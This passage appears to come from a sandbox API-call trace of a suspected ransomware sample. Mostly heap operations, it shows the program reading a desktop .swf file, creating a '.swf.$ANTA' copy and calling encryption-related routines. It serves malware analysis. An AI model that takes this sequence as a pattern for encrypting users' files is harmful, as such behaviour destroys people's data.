lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ctmepps 7ks0.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.683] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.683] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.684] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.684] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.684] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0122.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359860 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359860 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.686] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.686] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ctmepps 7ks0.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.687] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.687] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.687] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0122.688] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0122.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0122.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0122.691] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.691] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0122.693] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x7903, lpOverlapped=0x0) returned 1 [0122.694] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17903) returned 0x49aa010 [0122.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17903) returned 0x49c1920 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.697] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17903) returned 0x49aa010 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.698] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.698] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0122.698] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17903) returned 0x49aa010 [0122.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0122.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17903) returned 0x49d9230 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.700] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0122.700] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.700] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: 